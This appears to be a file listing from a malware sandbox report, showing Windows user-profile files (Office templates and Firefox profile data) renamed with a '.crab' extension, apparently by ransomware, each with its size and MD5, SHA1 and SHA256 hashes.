c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001115[[fn=parcel]].thmx.crab 594.38 KB MD5: 82d80fcc7496edcbc921003bdb632416
SHA1: 8f4732a89d028b9e6e69ad83db1f3d78bb9f4bcf
SHA256: 4fba2da0a76390c92a403871c51f243bbf80534bf8150862a4a565320ed7fef2 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328884[[fn=architecture]].glox.crab 6.16 KB MD5: 0bb4bdb1ad3ae30331cd4a7b9166de20
SHA1: c3f7ef1e109299f0cfac20a264a5577f18d76c30
SHA256: 57104660f4fce40fbe6d7cbdae1810a18dbe10ba27475f45c014d8d7d22b2713 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328893[[fn=bracketlist]].glox.crab 4.45 KB MD5: 7d3cc5fe86147052608e80aac9fa3004
SHA1: 718a7c2064048f0ca00d65d53b8d536548e37dc0
SHA256: 0dc28d88fe6a157353b967090149ccd0592c9f93a8cb04acdcc0f6f33fb7eade 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328905[[fn=chevron accent]].glox.crab 4.66 KB MD5: 23ea5cba7461185330eb220ee040c2d7
SHA1: d1aafba0da575942baa12353cfea132cb17f7f61
SHA256: 2ff304209f1a3bfde76102c63d2239714ab25e86a85cd21b34bd493ea4bf2178 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328908[[fn=circle process]].glox.crab 16.93 KB MD5: 3b55755a51ed19d0939e458c0af506ae
SHA1: 00b124472797e7dc38981e33a7e7b979ad4fdb08
SHA256: 3ea9c9ee9731f967b6361056ff78e7d4309200a352a65c0d64370e7b76c4725b 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328916[[fn=converging text]].glox.crab 11.63 KB MD5: d37b6720e3da80a9e7375dfba83cb767
SHA1: a15f1f387b85b37096bac8d5fd3dd6eb77a5f91a
SHA256: 988f9e3c34100b554523461e31fb45c445f1bd0d617bc01ca25864b74e5ff273 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328919[[fn=hexagon radial]].glox.crab 6.40 KB MD5: 91c7776f988133d5309c67d4bb76ddd3
SHA1: 112da68a210efad7eccda30181f28992b00f3748
SHA256: cca1b6738a42cacf7c627bfef4b84cab0792d367b793eac9fd05f06e4ea7e683 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328925[[fn=interconnected block process]].glox.crab 9.49 KB MD5: ce35c09310cf8dbe27156480bfc2d911
SHA1: c91ea9bcd23bb14fd999e57264142eec5e8f2541
SHA256: 5b702574c138f06baec1f8efd75aae1e1d8b939737e4d8aaacd0c09711f4d208 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328932[[fn=picture frame]].glox.crab 4.74 KB MD5: 659b2b07d1ba7af090d406281e227a7b
SHA1: 04e9c1776f4dd8d526ddf36c4514b336808e3957
SHA256: 706bc7c46bb49eea39b7c1d846d9cd27ff05dbb1418e02e0a40aad9a8f541634 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328935[[fn=picture organization chart]].glox.crab 7.71 KB MD5: e5546c76773f7f0d46c0c1eaf624ac0e
SHA1: b9ae5d745347f5ca879ec9fcef9232475e2f1bc1
SHA256: 68b17552576329270d0081aa045a1ea86b75d0a742f7e33290ae4b150f3de409 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328940[[fn=radial picture list]].glox.crab 5.98 KB MD5: cb5c3bf20c3a5658b93b70b416d51ead
SHA1: 419a0af6172d884db103b4577552d19df2fae4ea
SHA256: 26fb275758375bb40156bd94103f12a5cb60a46652814ce96de9c732f2ee7229 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328951[[fn=tabbed arc]].glox.crab 4.12 KB MD5: d16923b96c9f944396e9bd955a42c481
SHA1: ae092a33eaa78db184e779abd7dbf4e06284028d
SHA256: 6dd1c1b5c937c6a72767d0e5e94da683b7e2d0f9b3665c6e1732b80df326fed6 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328972[[fn=tab list]].glox.crab 5.29 KB MD5: b846257f7adc20c63b5b12dd3dc72ffa
SHA1: 88d56db603feaf6c92265166c13d0e93e41008e2
SHA256: 6fd7770b09742ec9321ac681089a0f8a26c40508c4c6ab00d984e86c9a2062aa 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328975[[fn=theme picture accent]].glox.crab 6.80 KB MD5: f557c122ed9a2a57c6c5af844398405f
SHA1: 94bf3cb35fe730a8de7e321dd485f797ac17ccf3
SHA256: 38e3b63dd7818857a646fca451562f8c5df4851673af40e98ea5c90e91bbe69c 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328983[[fn=theme picture alternating accent]].glox.crab 6.01 KB MD5: 35e7efa01ee6dafc1e407b76cee86094
SHA1: f103f130f75dc84b735332b7a8707416b44ee483
SHA256: 503dcab3ed2c6f3a4fe507751e45c6a9f845b38fabb302d3efcfdd5015af96a8 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328986[[fn=theme picture grid]].glox.crab 6.57 KB MD5: 03b725d1151c11b5b8d6c4b3b742a34f
SHA1: ac09bbd0999b3383f2d90eadd80a46881c5720aa
SHA256: caf95325711ca6b8fb346665b1a21197f2cebd41fc47518803c3a6f71a0cecdf 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328990[[fn=varying width list]].glox.crab 3.52 KB MD5: 91b581dc3770907db81085259e754a47
SHA1: 6995c2a7e39f752ffc01201007432c935c513747
SHA256: 6543e2f7887b30ca0e3fb4960ceb876ddf762fcd712ec98e9440ef1a7b55ad92 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328998[[fn=rings]].glox.crab 5.54 KB MD5: afedcf41a6360814fbcb29594b17ce02
SHA1: 87358e990dbb61b3b69c087301337ec61e8946e4
SHA256: 35c23e32758bb8c902c4d925e0e03967b3c361fc72b304cf8a7c8384dc1a5bce 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\normal.dotm.crab 18.93 KB MD5: 6d814453a37fb67bedede6c331ab7a58
SHA1: 974806d95429996e6d5a98c5c90361258325df0e
SHA256: fc20cba2631a2575c8c3548a2ec31183e08952fa50a161078255345ee07f1133 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\process map for basic flowchart.xltx.crab 107.88 KB MD5: 2cee03f664df22eec8d8a078fe158115
SHA1: d351f724259c4f8df70f68bc28ff38e5b3c98391
SHA256: c3a8431528c080c162a0ffc07cbf9e6e3b0309b53bd9882896a765beb3445759 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\process map for cross-functional flowchart.xltx.crab 141.85 KB MD5: bb206a7646aeb58f84ce41c32f7566bb
SHA1: 6fadf11d78c04c739ed0469f062452f3834c309e
SHA256: 30feff1db7f42bcd0e762d3917b82324ccb30d80ceeeb1fbcc5d086c701b95ba 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\stock symbols comparison.xltm.crab 1.39 MB MD5: 879eb3901289d988e007e578460c7f4e
SHA1: 4fa586fa003a6b35665cb5b639c24f8c7137ae83
SHA256: a04e562404563c31b3945dc07f247c957cb90712d772720eea0e0ec7e6c7d564 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\welcome to excel.xltx.crab 483.66 KB MD5: 4deac270584396aef84fb40f30fca057
SHA1: 5751fb0c58c8273a8705024094352e36c112adac
SHA256: a044f032137eab6f6c55ea4704270c88c6c4c5bb68eae8acb6116767f05bc61a 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\uproof\custom.dic.crab 0.54 KB MD5: 562b6ecbe3f6ecac78fbc06f87091c87
SHA1: c8aa8f529de494f6b51824e9e990b70a5faeb0e5
SHA256: 1746e411e9c7227f358e23187c270065f064525e705bb9eee239ad2a5481ee51 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\crash reports\installtime20170518000419.crab 0.52 KB MD5: 863f719bbb0c84c30e99731d0ae47dec
SHA1: 02399cc8d5ce6c879e5d8a9459e638a686610e3a
SHA256: 23e74f270c860ea1361e12e6230ad551965cd5a4cef4b9bdef13137c049f86d5 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\addons.json.crab 0.54 KB MD5: 5237bb5d611a4f5d6684c569a373e194
SHA1: e34b4855880327b3ff66a6cffd1fc5bb9a5a7374
SHA256: 2e2db1430abff141d60332e86d97adf68c45b3f6b6af5b157ca925fbf88f135a 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist-addons.json.crab 450.02 KB MD5: ccde482d67edc97ae152e37216fb772d
SHA1: 041bc909fa6d52300c9725888a3214d1e2c139fa
SHA256: b74f64e882376cea38aa7822acb27b9107d1a3ae478b3ab8a1b99263d0fb5e00 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist-gfx.json.crab 27.82 KB MD5: 55322250120ca9a370203ab002e9b0c2
SHA1: 315d4c56f7de4e7ac0f435b9c6a59ec645c0b2d6
SHA256: 075cfb07a6145062c2ac6b3bcf5d5b2f22f1c7f01112bba2305ac87be12ed08d 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist-plugins.json.crab 197.20 KB MD5: a7e1411f694bdf80c9367243e1d0cbc5
SHA1: 9ec27f2253abc0a5fe71ff61bba0085ce9d45174
SHA256: 5dd70301b4dafa4c7bf505d51e211b90da04cc3524ed27d27d5893bb28d58410 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist.xml.crab 252.41 KB MD5: d2652cd15f97265e85cdb09917be5ab5
SHA1: 46f41427644d4d23202d6900a1cda731c063cf74
SHA256: 31bee0f419a4615864c648ea36db8ddbc128f8404863b0d9fde89fc18af5d247 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\bookmarkbackups\bookmarks-2017-05-24_14_kl0o5i+exwq3txuldkmf9w==.jsonlz4.crab 1.85 KB MD5: 186d4318db722ca18d1fa4ba6c9ad186
SHA1: 1f7304f8f7ff0a9c74a9a72c8aef7df1f4e3acad
SHA256: 9822d7f3b7dcce39fe8e3f4fc3b242dfc92105efe9aee83751e863d78d8b6be8 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\cert8.db.crab 96.51 KB MD5: f253cee4b35ea8b0a5e3805b8ed24e4d
SHA1: 78e82d43deb51f31e6537e371255f662c78761ef
SHA256: f6d60fdbf2e030a061c7b491387728be986c6e2c6546ed034146e596a854fe76 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\compatibility.ini.crab 0.71 KB MD5: d6791e1048ba883792303c6b1e0c219a
SHA1: 4adf6fbc4b3c5ae74db6a88dde57fbca10b1b61c
SHA256: 7606eef55b7242341becda98c648b63921753414bcd652fb4d932f8981b3856b 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\containers.json.crab 1.30 KB MD5: d2de83ce134751ee31e5d5d3ec8428cb
SHA1: cee0038cf299a716e8d65ee6a261a6556a7c585a
SHA256: 782dada38b3a83f5b6a1a808bdea52aa576a76b257ed6b1d7043470fc9862839 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\content-prefs.sqlite.crab 224.51 KB MD5: 73e0d7f76779eee128f3adcc48cd05eb
SHA1: c8bba45c9d081a72cc9a600be7cb19934c78427b
SHA256: 1f4ffdc6ae31b78576a50c9f9f62851ccd2d9d20e0ed934a76f89086d2c8d0bf 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\cookies.sqlite.crab 512.51 KB MD5: 1a66e6875fae5a0453766f10c5f1760e
SHA1: c858ba28e1ccf68d70787608340af6e41195e355
SHA256: c9e8ee61891f01fe85b58266ed303bef4f898bdb6076802a358af82fb08f3bcc 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\crashes\store.json.mozlz4.crab 0.59 KB MD5: 2963e10ac7892b61f68b8fb42ee33a56
SHA1: 7489ac1072d8371baa91c684ecdde22126183f4b
SHA256: 73995262537b702e96e6193b9e1b1dbea06f5185e1c177aaf7a8571393c20595 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4.crab 6.05 KB MD5: 6456bda15345a28851d2005ce4a2906b
SHA1: e22f88056a400282b8c906ca3228a4d1f4615571
SHA256: c9b84b9d9fe9e757f892b5349222554a5462fe9116a9e13bb16b9d0b0ace0a60 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4.crab 5.38 KB MD5: 2aa0203060e62874b35f0e0312425aad
SHA1: b96b38b62c5048f817296551a953a03a90c509e8
SHA256: d5badee0e6721e57526972971c07929c8b242a932a7ba147f722cda0205f8b95 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4.crab 5.52 KB MD5: a492befd2051d69c4a46e7e06f44d1d9
SHA1: 4782e481f9725399f3ef188efb41456e5b2f58f0
SHA256: 396577dcf6dd7ddc21adb52264863d6d7e42a013d6122d03050cbfc1abe11917 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4.crab 5.70 KB MD5: 9e0dce18fa4dbfe99fbb2566edd59dee
SHA1: 561153d5aead3c1dea043117c2f9f011cc794345
SHA256: beaeb5ad8fa063490b3ae688557632e8905c529b0cd3caddb2b23c9cb1040d2d 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4.crab 5.66 KB MD5: ae098c3662630744ae6df4247d54549c
SHA1: c9908e10e9b45902d2026004f1cda7550ca2c81d
SHA256: 63a81b6f6bf73a3a984444a4de7461d24e4246da6ad7672fa5efa11a8a754857 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4.crab 6.55 KB MD5: 5d80bc8bbe067206be5f7e58539c8f6b
SHA1: aca4e9498b3715f1878ced9fcf910f40d68f63bc
SHA256: d809784e1c9b7b717e3e7154fd7f571cb4fe8a7785368b2cec7c943a87ac223c 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4.crab 5.57 KB MD5: 0fc1c1415649641b6db0a06730a39cfc
SHA1: e9e1c2f81f5f1e596c9dcc521535035e753655da
SHA256: e98d4ae467ae0baac25a832af03632bc22be97eb25e0dfc9ab1717c95cbe529a 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\session-state.json.crab 0.65 KB MD5: 8cc3ac066c912b6eaae37855f86f0c5b
SHA1: 1a07f39423d4ed835eb9db182ba78d32f2cb5231
SHA256: d262c7051aa426f3ebaf45cdcdf58e21a38534d0b14855f05a3c785877047859 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\state.json.crab 0.57 KB MD5: 11bad4daf90471e9617757049188247d
SHA1: 37cd5bffa0654c1c51b8ca2af6b61e3b8af8019f
SHA256: 5d98c23c5f736c60c17c0fc3916f29ccf7409435c510b5956de7e3e51061c223 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\extensions.ini.crab 0.70 KB MD5: 27c7e0bd228dfa1c4fbfb0b7c2db8d87
SHA1: 03f48eeb4f83c848c1fe41f0d463da1898c29120
SHA256: 0a684a1dafff52829c13c6575476a49c5a6cd8e99a1196d7f042c3a251397109 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\extensions.json.crab 6.30 KB MD5: 7285ba2de87d56918b5d5e02c8f30077
SHA1: 3b89e180d08e6b44dde0b0f1a107f1d5c05cc96c
SHA256: 792ba71b55f580233e561bd95a3ba91e0d618fba43d93f45170dbec4587acf86 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\formhistory.sqlite.crab 192.51 KB MD5: 20c9ba358fd680bdcf575b09dd9636e8
SHA1: 01aa86e1de7e06be0b74fc2a304968833932f14e
SHA256: 05b7815a2ed533343dcb12172fd8cc57540347b507cb10c3479c2f8ac7abebbd 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-gmpopenh264\1.6\gmpopenh264.info.crab 0.63 KB MD5: 48c99ae207ae0fe271cee6d85366691e
SHA1: e1c5587f011184b045adce40e8562e5d8c664408
SHA256: 865fae515e7c34eae2854473565c28043347a7eb4889f26f13138f553483e40b 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\license.txt.crab 0.98 KB MD5: 0b93478045268b1b6b2347ee864291ce
SHA1: 243c6d449936626a578457c09b88d35778d05ce0
SHA256: ce0377ec127115b385ecee8c65a493a1c673d03417ec105aee74dfb0aa1f7daf 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\manifest.json.crab 0.85 KB MD5: 8f82f272665570300be2401f3cfa6df2
SHA1: 45d3a0093510c9776e70c3e680f9853965954768
SHA256: 4914f23a67cd3e0af5dbb9277b33f03705cd47d4d5f07137aaa3bd09a75e93d3 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib.crab 2.93 KB MD5: 47f45426c220917da97befbe65e2f774
SHA1: d018dde9d71ddf8755204d414967a1fb600223b5
SHA256: c8d18a8cdcbcacfefd664dbd3a17ad6ec52bfb293dd62647e0eb8fd55f6f4d23 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\key3.db.crab 16.51 KB MD5: 558e5b2b4b13bde2c7947f69377a6c3b
SHA1: 1b97b857bb85a2f5cbdc7b0ffd88e09248694810
SHA256: 3c391d92e609fbdccbace385a8968ea9f597b4ad0506d277aa76471d0f205fe4 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\kinto.sqlite.crab 1.00 MB MD5: fe8211fa45665ad2118d089239cbda9f
SHA1: 324c3f644fd9d6fab2b9c469067a46222ac1550f
SHA256: 58298cc5f0349545362016bf098be5b30c366112cc7277426a73dd777fa1dfb2 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\mimetypes.rdf.crab 4.30 KB MD5: 3a4c9cfb59795e2cc6955cc9b0c1a7e5
SHA1: 147de31fd6d19c5aabbc4e35345bf59fbb5aaffa
SHA256: c7355c55c904895bac267fea395497a6430bc1e92c1bb3db28760a4120c4a23e 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\permissions.sqlite.crab 96.51 KB MD5: 66a8f7cd37d9cd3d2100aaaf0ddf591f
SHA1: acc551f95ba818774a06d3f7b321d119b8c0fe8a
SHA256: aa0085ce97e84e118daac705660eb75130d30c29bfeeac443114a29f677848c3 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\places.sqlite.crab 10.00 MB MD5: 60d1c39b40ff8a5861e1e7a2ab6584e4
SHA1: db011b90d7916f84cc5a6a57ce85690aff76d662
SHA256: cdf0815cc065a43d92b700b1ba8f3f4fa77377dfce7a83d12df41fe934863cd2 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\pluginreg.dat.crab 1.07 KB MD5: 024b832ed4adecc51892b4807d4c4f89
SHA1: 588b00b6275c4f07aa48cc4ec5d2f817bb864482
SHA256: e39b14993b832090c7200e6a2a75a908419b7848a7e6be4a067f48e83b8ad558 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\prefs.js.crab 11.71 KB MD5: 24bf90064a3314ca294f83c8366d6214
SHA1: 58c8fba8aeb2845ce4fa9e4299508f7acf7e67b6
SHA256: 66555c98693c42c35e1f4610c0a877fcfcbb120cb8f92751c7b579db43b57b77 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\revocations.txt.crab 21.43 KB MD5: 1f3506b9672e9aa56d4e0705058c160e
SHA1: 053b68d920ab1026e0c79a58ae7f0ad9127825c8
SHA256: c4df494812e8837d4d4579481fcb051938552ad5ef766473acc90701e4e3e42e 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\saved-telemetry-pings\d896fec9-1a7a-4db1-a3a2-e46d95b631a5.crab 10.96 KB MD5: e0c751a6d585091eee38adb11f3e2f98
SHA1: 25ab73c3257e91dda7fda426856b6cf3ba9fa63f
SHA256: 09898b163c461d8649da31ef16a5894a36662d59e5b69e66fec7883058bb9a98 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\search.json.mozlz4.crab 25.21 KB MD5: b4e629472baeb1d64b4b0d34b63c88a1
SHA1: 6bfaf46a59dd7021741a2126b8b33eea720845b6
SHA256: 372277b3e924d330cfab4f1481acf32e44d9d2d6950101001dd3a3c077ef4f1f 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\secmod.db.crab 16.51 KB MD5: ef16124de73326e7b9723fb5661de7f5
SHA1: c625c4b2d71cc965a7bcfa7562937124bde04140
SHA256: 397d60eb5e9699d1864023db7c32cbad79b2718b65d85cd274097dedbb522e06 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\sessioncheckpoints.json.crab 0.79 KB MD5: 6233a5471582c94869d8405c2655d896
SHA1: d69efad1b0b42a216a657bb073145853fc8f8a05
SHA256: 382459808253a2522660edfadb99b0db1e09a4235077dd660e35af9213a97e03 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\sessionstore-backups\previous.js.crab 167.84 KB MD5: f916fc047dbf2cca14f376a8e39274d9
SHA1: 101b9d3eaa6992e9380de0db32e144aa71295193
SHA256: 0c3c4e117f2b74f63c247719afcaa90bfac1554482fdea947a61de051bf7dcfc 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\sessionstore-backups\upgrade.js-20170518000419.crab 42.95 KB MD5: f6233f2574766a0eb5240b721a7a353d
SHA1: cec32aa661ed3ffaada37e3b712ad47cc5d19c33
SHA256: 71013073f9cea25f1fff1e77797300f191a749c9ef65a300490b4b672ca63654 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\sessionstore.js.crab 1.48 KB MD5: 8da7619514103ae9f2ff471d3896fad5
SHA1: 9ad4773cda2792ad69beea54f44614cd67c4d721
SHA256: 368edefc1fc5b8d7ab3ee1ce6d8fd5e827fc774b4197b488e36540c22d0a1b8f 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\sitesecurityservicestate.txt.crab 2.40 KB MD5: 18b042766544d1f2d2949aa833060037
SHA1: c2e4df5c887ed576e3e44270227d047e24bb55b8
SHA256: d03db4d613a296d10e8c1921fd87679e466484a0ca81f40edf36d8120612cfbe 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\chrome\.metadata.crab 0.54 KB MD5: 7b736b556210162b84f5250680aac1b7
SHA1: 4a0b75e421061c12e7a71aff0d61ad94e1bdd3dd
SHA256: b43e177f525fe01c588fad1eacf39c533455e2b78572db38124060f103117c7d 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\chrome\.metadata-v2.crab 0.55 KB MD5: 8c76249567262c7ec01c772f62064ef3
SHA1: e8ca906689c5e4d677fb2e234174944c6ccb50f7
SHA256: 4112df695b24f25c05131220cad825a810f7be87f58fe7e541417788f5e899d7 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.crab 48.51 KB MD5: bb29530e57876b224d8f940382687542
SHA1: 63318d1b8915353ff51ec7c4a13450ccffe19c18
SHA256: ff1827b11cc5550cbf62ab4383f47562d69b1cc4329f195addd8a6b077a29f81 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\.metadata.crab 0.55 KB MD5: 9f501ddff26449c0dfb7a0bc7e757c04
SHA1: 553c80f9d52fbee593957b571cc2e890c4a0fdf1
SHA256: 1b97aac857a1f684b9f4933f5efe10a1d16f4e4bd107e82a7a0a4f1daf03df75 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\.metadata-v2.crab 0.57 KB MD5: fcbc796a0f1a4676915e8401cfadac21
SHA1: 038dc671641c8e04bf45999e9596274c1f6d150d
SHA256: d2923822ce9e490aa75db949d4996f9ed98e5c6495175eec016e72ed99942609 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\1.crab 517.05 KB MD5: c2279c5c66d5d401139f6cee539de121
SHA1: 6aa6ee0b640ecf0b0e25ac27bd7bc718e49aa551
SHA256: 3e70e67dc67646ab4cd90630dcb3413049d4188c82f94741956d5f6bf349f1cb 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite.crab 48.51 KB MD5: 3f402e609d6d49615931976c00f7de8a
SHA1: 4afda2cdbf0a41a46c5eaf9b5f6c81b79c88f2ca
SHA256: aec41f3b9f6b2e5478748dbd3c2a7f4b096bdc5a90199e84b01faaef92d0b37f 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage.sqlite.crab 1.01 KB MD5: c54ce70ef5d689e175c17ddfdf1b0772
SHA1: 4628e5f6f54f21a1a2ff5a0424c5a84e41ac0fe6
SHA256: 1c5ad8c7d10aeca6f8029983bcb7baebc0c0bd8d89985304dbd9f4859a4323b5 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\times.json.crab 0.54 KB MD5: 5793b35c8c11f79f1d37ad8866cc29e7
SHA1: fd27bb756e1360ccbb676d0563d95fc708136db0
SHA256: 13744bd88daf6ae27d995c6cae65331a69e52f9062fa70e935cf07fc85b5c5c7 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\webappsstore.sqlite.crab 96.51 KB MD5: babe3b530b239141720280b79956d6c7
SHA1: c6840977ecb89bbc51694ce8f42cd3842be22f7a
SHA256: e9a85c80fae4251cc4642cc1dc0915197ea9594848c17e73e55ec2713d25374b 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\xulstore.json.crab 1.32 KB MD5: 961399123326cd41d0d6bc345e8eb002
SHA1: 8e970abb0bd0335167c0b8b10cf91e8176d75764
